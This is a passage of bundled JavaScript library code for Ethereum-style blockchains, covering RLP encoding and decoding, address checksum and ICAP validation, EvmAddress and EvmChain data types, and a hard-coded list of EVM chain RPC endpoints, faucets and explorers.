            payload = payload.concat($6ff2d0f6bfa15181$var$_encode(child));
        });
        if (payload.length <= 55) {
            payload.unshift(0xc0 + payload.length);
            return payload;
        }
        const length = $6ff2d0f6bfa15181$var$arrayifyInteger(payload.length);
        length.unshift(0xf7 + length.length);
        return length.concat(payload);
    }
    if (!(0, $7b88b6e03e4708f2$export$9a14abb1a440cd5e)(object)) $6ff2d0f6bfa15181$var$logger.throwArgumentError("RLP object must be BytesLike", "object", object);
    const data = Array.prototype.slice.call((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(object));
    if (data.length === 1 && data[0] <= 0x7f) return data;
    else if (data.length <= 55) {
        data.unshift(0x80 + data.length);
        return data;
    }
    const length = $6ff2d0f6bfa15181$var$arrayifyInteger(data.length);
    length.unshift(0xb7 + length.length);
    return length.concat(data);
}
function $6ff2d0f6bfa15181$export$c564cdbbe6da493(object) {
    return (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)($6ff2d0f6bfa15181$var$_encode(object));
}
function $6ff2d0f6bfa15181$var$_decodeChildren(data, offset, childOffset, length) {
    const result = [];
    while(childOffset < offset + 1 + length){
        const decoded = $6ff2d0f6bfa15181$var$_decode(data, childOffset);
        result.push(decoded.result);
        childOffset += decoded.consumed;
        if (childOffset > offset + 1 + length) $6ff2d0f6bfa15181$var$logger.throwError("child data too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
    }
    return {
        consumed: 1 + length,
        result: result
    };
}
// returns { consumed: number, result: Object }
function $6ff2d0f6bfa15181$var$_decode(data, offset) {
    if (data.length === 0) $6ff2d0f6bfa15181$var$logger.throwError("data too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
    // Array with extra length prefix
    if (data[offset] >= 0xf8) {
        const lengthLength = data[offset] - 0xf7;
        if (offset + 1 + lengthLength > data.length) $6ff2d0f6bfa15181$var$logger.throwError("data short segment too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
        const length = $6ff2d0f6bfa15181$var$unarrayifyInteger(data, offset + 1, lengthLength);
        if (offset + 1 + lengthLength + length > data.length) $6ff2d0f6bfa15181$var$logger.throwError("data long segment too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
        return $6ff2d0f6bfa15181$var$_decodeChildren(data, offset, offset + 1 + lengthLength, lengthLength + length);
    } else if (data[offset] >= 0xc0) {
        const length = data[offset] - 0xc0;
        if (offset + 1 + length > data.length) $6ff2d0f6bfa15181$var$logger.throwError("data array too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
        return $6ff2d0f6bfa15181$var$_decodeChildren(data, offset, offset + 1, length);
    } else if (data[offset] >= 0xb8) {
        const lengthLength = data[offset] - 0xb7;
        if (offset + 1 + lengthLength > data.length) $6ff2d0f6bfa15181$var$logger.throwError("data array too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
        const length = $6ff2d0f6bfa15181$var$unarrayifyInteger(data, offset + 1, lengthLength);
        if (offset + 1 + lengthLength + length > data.length) $6ff2d0f6bfa15181$var$logger.throwError("data array too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
        const result = (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(data.slice(offset + 1 + lengthLength, offset + 1 + lengthLength + length));
        return {
            consumed: 1 + lengthLength + length,
            result: result
        };
    } else if (data[offset] >= 0x80) {
        const length = data[offset] - 0x80;
        if (offset + 1 + length > data.length) $6ff2d0f6bfa15181$var$logger.throwError("data too short", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {});
        const result = (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(data.slice(offset + 1, offset + 1 + length));
        return {
            consumed: 1 + length,
            result: result
        };
    }
    return {
        consumed: 1,
        result: (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(data[offset])
    };
}
function $6ff2d0f6bfa15181$export$2f872c0f2117be69(data) {
    const bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data);
    const decoded = $6ff2d0f6bfa15181$var$_decode(bytes, 0);
    if (decoded.consumed !== bytes.length) $6ff2d0f6bfa15181$var$logger.throwArgumentError("invalid rlp data", "data", data);
    return decoded.result;
}



const $f0caac95ce71359f$export$83d89fbfd8236492 = "address/5.7.0";


"use strict";
const $8aee8aee2d40605d$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $f0caac95ce71359f$export$83d89fbfd8236492));
function $8aee8aee2d40605d$var$getChecksumAddress(address) {
    if (!(0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(address, 20)) $8aee8aee2d40605d$var$logger.throwArgumentError("invalid address", "address", address);
    address = address.toLowerCase();
    const chars = address.substring(2).split("");
    const expanded = new Uint8Array(40);
    for(let i = 0; i < 40; i++)expanded[i] = chars[i].charCodeAt(0);
    const hashed = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)((0, $1dbc6131e27af3ca$export$f8151fce47ad1c35)(expanded));
    for(let i = 0; i < 40; i += 2){
        if (hashed[i >> 1] >> 4 >= 8) chars[i] = chars[i].toUpperCase();
        if ((hashed[i >> 1] & 0x0f) >= 8) chars[i + 1] = chars[i + 1].toUpperCase();
    }
    return "0x" + chars.join("");
}
// Shims for environments that are missing some required constants and functions
const $8aee8aee2d40605d$var$MAX_SAFE_INTEGER = 0x1fffffffffffff;
function $8aee8aee2d40605d$var$log10(x) {
    if (Math.log10) return Math.log10(x);
    return Math.log(x) / Math.LN10;
}
// See: https://en.wikipedia.org/wiki/International_Bank_Account_Number
// Create lookup table
const $8aee8aee2d40605d$var$ibanLookup = {};
for(let i = 0; i < 10; i++)$8aee8aee2d40605d$var$ibanLookup[String(i)] = String(i);
for(let i = 0; i < 26; i++)$8aee8aee2d40605d$var$ibanLookup[String.fromCharCode(65 + i)] = String(10 + i);
// How many decimal digits can we process? (for 64-bit float, this is 15)
const $8aee8aee2d40605d$var$safeDigits = Math.floor($8aee8aee2d40605d$var$log10($8aee8aee2d40605d$var$MAX_SAFE_INTEGER));
function $8aee8aee2d40605d$var$ibanChecksum(address) {
    address = address.toUpperCase();
    address = address.substring(4) + address.substring(0, 2) + "00";
    let expanded = address.split("").map((c)=>{
        return $8aee8aee2d40605d$var$ibanLookup[c];
    }).join("");
    // Javascript can handle integers safely up to 15 (decimal) digits
    while(expanded.length >= $8aee8aee2d40605d$var$safeDigits){
        let block = expanded.substring(0, $8aee8aee2d40605d$var$safeDigits);
        expanded = parseInt(block, 10) % 97 + expanded.substring(block.length);
    }
    let checksum = String(98 - parseInt(expanded, 10) % 97);
    while(checksum.length < 2)checksum = "0" + checksum;
    return checksum;
}
function $8aee8aee2d40605d$export$88411125f012957a(address) {
    let result = null;
    if (typeof address !== "string") $8aee8aee2d40605d$var$logger.throwArgumentError("invalid address", "address", address);
    if (address.match(/^(0x)?[0-9a-fA-F]{40}$/)) {
        // Missing the 0x prefix
        if (address.substring(0, 2) !== "0x") address = "0x" + address;
        result = $8aee8aee2d40605d$var$getChecksumAddress(address);
        // It is a checksummed address with a bad checksum
        if (address.match(/([A-F].*[a-f])|([a-f].*[A-F])/) && result !== address) $8aee8aee2d40605d$var$logger.throwArgumentError("bad address checksum", "address", address);
    // Maybe ICAP? (we only support direct mode)
    } else if (address.match(/^XE[0-9]{2}[0-9A-Za-z]{30,31}$/)) {
        // It is an ICAP address with a bad checksum
        if (address.substring(2, 4) !== $8aee8aee2d40605d$var$ibanChecksum(address)) $8aee8aee2d40605d$var$logger.throwArgumentError("bad icap checksum", "address", address);
        result = (0, $0df4577496dcf693$export$51e4a08295f7770f)(address.substring(4));
        while(result.length < 40)result = "0" + result;
        result = $8aee8aee2d40605d$var$getChecksumAddress("0x" + result);
    } else $8aee8aee2d40605d$var$logger.throwArgumentError("invalid address", "address", address);
    return result;
}
function $8aee8aee2d40605d$export$977e255126d763d6(address) {
    try {
        $8aee8aee2d40605d$export$88411125f012957a(address);
        return true;
    } catch (error) {}
    return false;
}
function $8aee8aee2d40605d$export$962c4ddada9f668f(address) {
    let base36 = (0, $0df4577496dcf693$export$1293db5d29c264ff)($8aee8aee2d40605d$export$88411125f012957a(address).substring(2)).toUpperCase();
    while(base36.length < 30)base36 = "0" + base36;
    return "XE" + $8aee8aee2d40605d$var$ibanChecksum("XE00" + base36) + base36;
}
function $8aee8aee2d40605d$export$b7fbffef12272e40(transaction) {
    let from = null;
    try {
        from = $8aee8aee2d40605d$export$88411125f012957a(transaction.from);
    } catch (error) {
        $8aee8aee2d40605d$var$logger.throwArgumentError("missing from address", "transaction", transaction);
    }
    const nonce = (0, $7b88b6e03e4708f2$export$a8f4574d0e56446c)((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)((0, $0df4577496dcf693$export$d97aa349ed20696).from(transaction.nonce).toHexString()));
    return $8aee8aee2d40605d$export$88411125f012957a((0, $7b88b6e03e4708f2$export$15da666eba198c18)((0, $1dbc6131e27af3ca$export$f8151fce47ad1c35)((0, $6ff2d0f6bfa15181$export$c564cdbbe6da493)([
        from,
        nonce
    ])), 12));
}
function $8aee8aee2d40605d$export$e0b22d96621f73a2(from, salt, initCodeHash) {
    if ((0, $7b88b6e03e4708f2$export$13882f896d3c0683)(salt) !== 32) $8aee8aee2d40605d$var$logger.throwArgumentError("salt must be 32 bytes", "salt", salt);
    if ((0, $7b88b6e03e4708f2$export$13882f896d3c0683)(initCodeHash) !== 32) $8aee8aee2d40605d$var$logger.throwArgumentError("initCodeHash must be 32 bytes", "initCodeHash", initCodeHash);
    return $8aee8aee2d40605d$export$88411125f012957a((0, $7b88b6e03e4708f2$export$15da666eba198c18)((0, $1dbc6131e27af3ca$export$f8151fce47ad1c35)((0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)([
        "0xff",
        $8aee8aee2d40605d$export$88411125f012957a(from),
        salt,
        initCodeHash
    ])), 12));
}



// $ref: #/components/schemas/chainList
// typeName: chainList
var $3dfc2d9370ba0cd1$export$cbb32849b2b767ab = /** @class */ function() {
    function EvmChainList() {}
    EvmChainList.create = function(input) {
        return input;
    };
    EvmChainList.fromJSON = function(json) {
        return json;
    };
    return EvmChainList;
}();
// $ref: #/paths/~1nft~1{address}~1trades/get/parameters/5/schema
// typeName: getNFTTrades_marketplace_Enum
var $3dfc2d9370ba0cd1$export$ae23353d645c745 = /** @class */ function() {
    function EvmGetNFTTradesMarketplaceEnum() {}
    EvmGetNFTTradesMarketplaceEnum.create = function(input) {
        return input;
    };
    EvmGetNFTTradesMarketplaceEnum.fromJSON = function(json) {
        return json;
    };
    return EvmGetNFTTradesMarketplaceEnum;
}();
// $ref: #/components/schemas/contractsReviewItem/properties/report_type
// typeName: contractsReviewItem_report_type_Enum
var $3dfc2d9370ba0cd1$export$c968a902019a93c4 = /** @class */ function() {
    function EvmContractsReviewItemReportTypeEnum() {}
    EvmContractsReviewItemReportTypeEnum.create = function(input) {
        return input;
    };
    EvmContractsReviewItemReportTypeEnum.fromJSON = function(json) {
        return json;
    };
    return EvmContractsReviewItemReportTypeEnum;
}();
// $ref: #/components/schemas/contractsReviewItem/properties/contract_type
// typeName: contractsReviewItem_contract_type_Enum
var $3dfc2d9370ba0cd1$export$5380f06018e84a7e = /** @class */ function() {
    function EvmContractsReviewItemContractTypeEnum() {}
    EvmContractsReviewItemContractTypeEnum.create = function(input) {
        return input;
    };
    EvmContractsReviewItemContractTypeEnum.fromJSON = function(json) {
        return json;
    };
    return EvmContractsReviewItemContractTypeEnum;
}();
/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $3dfc2d9370ba0cd1$var$extendStatics = function(d, b) {
    $3dfc2d9370ba0cd1$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $3dfc2d9370ba0cd1$var$extendStatics(d, b);
};
function $3dfc2d9370ba0cd1$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $3dfc2d9370ba0cd1$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $3dfc2d9370ba0cd1$var$__assign = function() {
    $3dfc2d9370ba0cd1$var$__assign = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $3dfc2d9370ba0cd1$var$__assign.apply(this, arguments);
};
function $3dfc2d9370ba0cd1$var$__spreadArray(to, from, pack) {
    if (pack || arguments.length === 2) {
        for(var i = 0, l = from.length, ar; i < l; i++)if (ar || !(i in from)) {
            if (!ar) ar = Array.prototype.slice.call(from, 0, i);
            ar[i] = from[i];
        }
    }
    return to.concat(ar || Array.prototype.slice.call(from));
}
/**
 * A representation of an address on the EVM network.
 *
 * Use this class any time you work with an address, as it will provide utilities to validate the address,
 * and format it to lowercase and checksum format.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$762b85ce1c60fa11 = /** @class */ function() {
    function EvmAddress(address) {
        this._value = EvmAddress.parse(address);
    }
    Object.defineProperty(EvmAddress, "ZERO_ADDRESS", {
        /**
         * @returns EvmAddress instance of the zero address: "0x0000000000000000000000000000000000000000"
         * @example `EvmAddress.ZERO_ADDRESS`
         */ get: function() {
            return EvmAddress.create("0x0000000000000000000000000000000000000000");
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Create a new instance of EvmAddress from any valid address input
     *
     * @example
     * ```
     * const address = EvmAddress.create("0xfb6916095ca1df60bb79ce92ce3ea74c37c5d359")
     * const address = EvmAddress.create("0xfB6916095ca1df60bB79Ce92cE3Ea74c37c5d359")
     * const address = EvmAddress.ZERO_ADDRESS
     * ```
     */ EvmAddress.create = function(address) {
        if (address instanceof EvmAddress) return address;
        return new EvmAddress(address);
    };
    EvmAddress.fromJSON = function(address) {
        return new EvmAddress(address);
    };
    EvmAddress.parse = function(address) {
        if (!(0, $8aee8aee2d40605d$export$977e255126d763d6)(address)) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Invalid address provided: ".concat(address)
        });
        return (0, $8aee8aee2d40605d$export$88411125f012957a)(address);
    };
    /**
     * Check the equality between two Evm addresses
     * @example `EvmAddress.equals("0xfB6916095ca1df60bB79Ce92cE3Ea74c37c5d359", "0xfb6916095ca1df60bb79ce92ce3ea74c37c5d359")`
     */ EvmAddress.equals = function(addressA, addressB) {
        return EvmAddress.create(addressA)._value === EvmAddress.create(addressB)._value;
    };
    /**
     * Checks the equality of the current address with another evm address
     * @example `address.equals("0xfb6916095ca1df60bb79ce92ce3ea74c37c5d359")`
     */ EvmAddress.prototype.equals = function(address) {
        return EvmAddress.equals(this, address);
    };
    Object.defineProperty(EvmAddress.prototype, "checksum", {
        /**
         * @returns the address value in checksum (EIP-55) format (see https://eips.ethereum.org/EIPS/eip-55)
         * @example `address.checksum // "0xfB6916095ca1df60bB79Ce92cE3Ea74c37c5d359"`
         */ get: function() {
            return this._value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmAddress.prototype, "lowercase", {
        /**
         * @returns the address value in lowercase format
         * @example `address.lowercase // "0xfb6916095ca1df60bb79ce92ce3ea74c37c5d359"`
         */ get: function() {
            return this._value.toLowerCase();
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Returns a JSON representation of the address.
     * @returns an address.
     */ EvmAddress.prototype.toJSON = function() {
        // We convert to lowercase because we want to keep backwards compatibility.
        return this.lowercase;
    };
    return EvmAddress;
}();
// source: https://chainid.network/chains.json
var $3dfc2d9370ba0cd1$var$chainList = [
    {
        name: "Ethereum Mainnet",
        chain: "ETH",
        icon: "ethereum",
        rpc: [
            "https://mainnet.infura.io/v3/${INFURA_API_KEY}",
            "wss://mainnet.infura.io/ws/v3/${INFURA_API_KEY}",
            "https://api.mycryptoapi.com/eth",
            "https://cloudflare-eth.com",
            "https://ethereum.publicnode.com"
        ],
        features: [
            {
                name: "EIP155"
            },
            {
                name: "EIP1559"
            }
        ],
        faucets: [],
        nativeCurrency: {
            name: "Ether",
            symbol: "ETH",
            decimals: 18
        },
        infoURL: "https://ethereum.org",
        shortName: "eth",
        chainId: 1,
        networkId: 1,
        slip44: 60,
        ens: {
            registry: "0x00000000000C2E074eC69A0dFb2997BA6C7d2e1e"
        },
        explorers: [
            {
                name: "etherscan",
                url: "https://etherscan.io",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Goerli",
        title: "Ethereum Testnet Goerli",
        chain: "ETH",
        rpc: [
            "https://goerli.infura.io/v3/${INFURA_API_KEY}",
            "wss://goerli.infura.io/v3/${INFURA_API_KEY}",
            "https://rpc.goerli.mudit.blog/",
            "https://ethereum-goerli.publicnode.com"
        ],
        faucets: [
            "http://fauceth.komputing.org?chain=5&address=${ADDRESS}",
            "https://goerli-faucet.slock.it?address=${ADDRESS}",
            "https://faucet.goerli.mudit.blog"
        ],
        nativeCurrency: {
            name: "Goerli Ether",
            symbol: "ETH",
            decimals: 18
        },
        infoURL: "https://goerli.net/#about",
        shortName: "gor",
        chainId: 5,
        networkId: 5,
        ens: {
            registry: "0x112234455c3a32fd11230c42e7bccd4a84e02010"
        },
        explorers: [
            {
                name: "etherscan-goerli",
                url: "https://goerli.etherscan.io",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Optimism",
        chain: "ETH",
        rpc: [
            "https://mainnet.optimism.io/"
        ],
        faucets: [],
        nativeCurrency: {
            name: "Ether",
            symbol: "ETH",
            decimals: 18
        },
        infoURL: "https://optimism.io",
        shortName: "oeth",
        chainId: 10,
        networkId: 10,
        explorers: [
            {
                name: "etherscan",
                url: "https://optimistic.etherscan.io",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Cronos Mainnet Beta",
        chain: "CRO",
        rpc: [
            "https://evm.cronos.org",
            "https://cronos-evm.publicnode.com"
        ],
        features: [
            {
                name: "EIP1559"
            }
        ],
        faucets: [],
        nativeCurrency: {
            name: "Cronos",
            symbol: "CRO",
            decimals: 18
        },
        infoURL: "https://cronos.org/",
        shortName: "cro",
        chainId: 25,
        networkId: 25,
        explorers: [
            {
                name: "Cronos Explorer",
                url: "https://cronoscan.com",
                standard: "none"
            }
        ]
    },
    {
        name: "Binance Smart Chain Mainnet",
        chain: "BSC",
        rpc: [
            "https://bsc-dataseed1.binance.org",
            "https://bsc-dataseed2.binance.org",
            "https://bsc-dataseed3.binance.org",
            "https://bsc-dataseed4.binance.org",
            "https://bsc-dataseed1.defibit.io",
            "https://bsc-dataseed2.defibit.io",
            "https://bsc-dataseed3.defibit.io",
            "https://bsc-dataseed4.defibit.io",
            "https://bsc-dataseed1.ninicoin.io",
            "https://bsc-dataseed2.ninicoin.io",
            "https://bsc-dataseed3.ninicoin.io",
            "https://bsc-dataseed4.ninicoin.io",
            "https://bsc.publicnode.com",
            "wss://bsc-ws-node.nariox.org"
        ],
        faucets: [
            "https://free-online-app.com/faucet-for-eth-evm-chains/"
        ],
        nativeCurrency: {
            name: "Binance Chain Native Token",
            symbol: "BNB",
            decimals: 18
        },
        infoURL: "https://www.binance.org",
        shortName: "bnb",
        chainId: 56,
        networkId: 56,
        slip44: 714,
        explorers: [
            {
                name: "bscscan",
                url: "https://bscscan.com",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Binance Smart Chain Testnet",
        chain: "BSC",
        rpc: [
            "https://data-seed-prebsc-1-s1.binance.org:8545",
            "https://data-seed-prebsc-2-s1.binance.org:8545",
            "https://data-seed-prebsc-1-s2.binance.org:8545",
            "https://data-seed-prebsc-2-s2.binance.org:8545",
            "https://data-seed-prebsc-1-s3.binance.org:8545",
            "https://data-seed-prebsc-2-s3.binance.org:8545",
            "https://bsc-testnet.publicnode.com"
        ],
        faucets: [
            "https://testnet.binance.org/faucet-smart"
        ],
        nativeCurrency: {
            name: "Binance Chain Native Token",
            symbol: "tBNB",
            decimals: 18
        },
        infoURL: "https://testnet.binance.org/",
        shortName: "bnbt",
        chainId: 97,
        networkId: 97,
        explorers: [
            {
                name: "bscscan-testnet",
                url: "https://testnet.bscscan.com",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Polygon Mainnet",
        chain: "Polygon",
        icon: "polygon",
        rpc: [
            "https://polygon-rpc.com/",
            "https://rpc-mainnet.matic.network",
            "https://matic-mainnet.chainstacklabs.com",
            "https://rpc-mainnet.maticvigil.com",
            "https://rpc-mainnet.matic.quiknode.pro",
            "https://matic-mainnet-full-rpc.bwarelabs.com",
            "https://polygon-bor.publicnode.com"
        ],
        faucets: [],
        nativeCurrency: {
            name: "MATIC",
            symbol: "MATIC",
            decimals: 18
        },
        infoURL: "https://polygon.technology/",
        shortName: "matic",
        chainId: 137,
        networkId: 137,
        slip44: 966,
        explorers: [
            {
                name: "polygonscan",
                url: "https://polygonscan.com",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Fantom Opera",
        chain: "FTM",
        rpc: [
            "https://rpc.ftm.tools",
            "https://fantom.publicnode.com"
        ],
        faucets: [
            "https://free-online-app.com/faucet-for-eth-evm-chains/"
        ],
        nativeCurrency: {
            name: "Fantom",
            symbol: "FTM",
            decimals: 18
        },
        infoURL: "https://fantom.foundation",
        shortName: "ftm",
        chainId: 250,
        networkId: 250,
        icon: "fantom",
        explorers: [
            {
                name: "ftmscan",
                url: "https://ftmscan.com",
                icon: "ftmscan",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Fantom Testnet",
        chain: "FTM",
        rpc: [
            "https://rpc.testnet.fantom.network",
            "https://fantom-testnet.publicnode.com"
        ],
        faucets: [
            "https://faucet.fantom.network"
        ],
        nativeCurrency: {
            name: "Fantom",
            symbol: "FTM",
            decimals: 18
        },
        infoURL: "https://docs.fantom.foundation/quick-start/short-guide#fantom-testnet",
        shortName: "tftm",
        chainId: 4002,
        networkId: 4002,
        icon: "fantom",
        explorers: [
            {
                name: "ftmscan",
                url: "https://testnet.ftmscan.com",
                icon: "ftmscan",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Arbitrum One",
        chainId: 42161,
        shortName: "arb1",
        chain: "ETH",
        networkId: 42161,
        nativeCurrency: {
            name: "Ether",
            symbol: "ETH",
            decimals: 18
        },
        rpc: [
            "https://arbitrum-mainnet.infura.io/v3/${INFURA_API_KEY}",
            "https://arb-mainnet.g.alchemy.com/v2/${ALCHEMY_API_KEY}",
            "https://arb1.arbitrum.io/rpc"
        ],
        faucets: [],
        explorers: [
            {
                name: "Arbiscan",
                url: "https://arbiscan.io",
                standard: "EIP3091"
            },
            {
                name: "Arbitrum Explorer",
                url: "https://explorer.arbitrum.io",
                standard: "EIP3091"
            }
        ],
        infoURL: "https://arbitrum.io",
        parent: {
            type: "L2",
            chain: "eip155-1",
            bridges: [
                {
                    url: "https://bridge.arbitrum.io"
                }
            ]
        }
    },
    {
        name: "Avalanche Fuji Testnet",
        chain: "AVAX",
        icon: "avax",
        rpc: [
            "https://api.avax-test.network/ext/bc/C/rpc",
            "https://avalanche-fuji-c-chain.publicnode.com"
        ],
        faucets: [
            "https://faucet.avax-test.network/"
        ],
        nativeCurrency: {
            name: "Avalanche",
            symbol: "AVAX",
            decimals: 18
        },
        infoURL: "https://cchain.explorer.avax-test.network",
        shortName: "Fuji",
        chainId: 43113,
        networkId: 1,
        explorers: [
            {
                name: "snowtrace",
                url: "https://testnet.snowtrace.io",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Avalanche C-Chain",
        chain: "AVAX",
        icon: "avax",
        rpc: [
            "https://api.avax.network/ext/bc/C/rpc",
            "https://avalanche-c-chain.publicnode.com"
        ],
        features: [
            {
                name: "EIP1559"
            }
        ],
        faucets: [
            "https://free-online-app.com/faucet-for-eth-evm-chains/"
        ],
        nativeCurrency: {
            name: "Avalanche",
            symbol: "AVAX",
            decimals: 18
        },
        infoURL: "https://www.avax.network/",
        shortName: "avax",
        chainId: 43114,
        networkId: 43114,
        slip44: 9005,
        explorers: [
            {
                name: "snowtrace",
                url: "https://snowtrace.io",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Mumbai",
        title: "Polygon Testnet Mumbai",
        chain: "Polygon",
        icon: "polygon",
        rpc: [
            "https://matic-mumbai.chainstacklabs.com",
            "https://rpc-mumbai.maticvigil.com",
            "https://matic-testnet-archive-rpc.bwarelabs.com",
            "https://polygon-mumbai-bor.publicnode.com"
        ],
        faucets: [
            "https://faucet.polygon.technology/"
        ],
        nativeCurrency: {
            name: "MATIC",
            symbol: "MATIC",
            decimals: 18
        },
        infoURL: "https://polygon.technology/",
        shortName: "maticmum",
        chainId: 80001,
        networkId: 80001,
        explorers: [
            {
                name: "polygonscan",
                url: "https://mumbai.polygonscan.com",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Arbitrum Goerli",
        title: "Arbitrum Goerli Rollup Testnet",
        chainId: 421613,
        shortName: "arb-goerli",
        chain: "ETH",
        networkId: 421613,
        nativeCurrency: {
            name: "Arbitrum Goerli Ether",
            symbol: "AGOR",
            decimals: 18
        },
        rpc: [
            "https://goerli-rollup.arbitrum.io/rpc/"
        ],
        faucets: [],
        infoURL: "https://arbitrum.io/",
        explorers: [
            {
                name: "Arbitrum Goerli Rollup Explorer",
                url: "https://goerli-rollup-explorer.arbitrum.io",
                standard: "EIP3091"
            }
        ],
        parent: {
            type: "L2",
            chain: "eip155-5",
            bridges: [
                {
                    url: "https://bridge.arbitrum.io/"
                }
            ]
        }
    },
    {
        name: "Sepolia",
        title: "Ethereum Testnet Sepolia",
        chain: "ETH",
        rpc: [
            "https://rpc.sepolia.org",
            "https://rpc2.sepolia.org",
            "https://rpc-sepolia.rockx.com"
        ],
        faucets: [
            "http://fauceth.komputing.org?chain=11155111&address=${ADDRESS}"
        ],
        nativeCurrency: {
            name: "Sepolia Ether",
            symbol: "ETH",
            decimals: 18
        },
        infoURL: "https://sepolia.otterscan.io",
        shortName: "sep",
        chainId: 11155111,
        networkId: 11155111,
        explorers: [
            {
                name: "etherscan-sepolia",
                url: "https://sepolia.etherscan.io",
                standard: "EIP3091"
            },
            {
                name: "otterscan-sepolia",
                url: "https://sepolia.otterscan.io",
                standard: "EIP3091"
            }
        ]
    },
    {
        name: "Palm",
        chain: "Palm",
        icon: "palm",
        rpc: [
            "https://palm-mainnet.infura.io/v3/${INFURA_API_KEY}"
        ],
        faucets: [],
        nativeCurrency: {
            name: "PALM",
            symbol: "PALM",
            decimals: 18
        },
        infoURL: "https://palm.io",
        shortName: "palm",
        chainId: 11297108109,
        networkId: 11297108109,
        explorers: [
            {
                name: "Palm Explorer",
                url: "https://explorer.palm.io",
                standard: "EIP3091"
            }
        ]
    }
];
var $3dfc2d9370ba0cd1$var$INVALID_VALUES = [
    "0x",
    "0x0",
    "0",
    0
];
var $3dfc2d9370ba0cd1$export$cd8343224d91538d = /** @class */ function() {
    function EvmChainParser() {}
    EvmChainParser.parse = function(chain) {
        if ($3dfc2d9370ba0cd1$var$INVALID_VALUES.includes(chain)) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Invalid provided chain, value must be a positive number, or a hex-string starting with '0x'"
        });
        if (typeof chain === "string") {
            if (chain.startsWith("0x")) return chain;
            try {
                var parsed = parseInt(chain, 10);
                if (Number.isNaN(parsed)) throw new Error("Cannot parse the provided string value to a valid chain number");
                return "0x".concat(parsed.toString(16));
            } catch (error) {
                throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
                    code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
                    message: "Invalid provided chain, value must be a positive number, or a hex-string starting with '0x'"
                });
            }
        }
        if (chain <= 0) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Invalid provided chain, value must be a positive number, or a hex-string starting with '0x'"
        });
        return "0x".concat(chain.toString(16));
    };
    return EvmChainParser;
}();
/**
 * The EvmChain class is a MoralisData that references to a EVM chain
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7 = /** @class */ function() {
    function EvmChain(value) {
        var _this = this;
        var _a;
        this._value = $3dfc2d9370ba0cd1$export$cd8343224d91538d.parse(value);
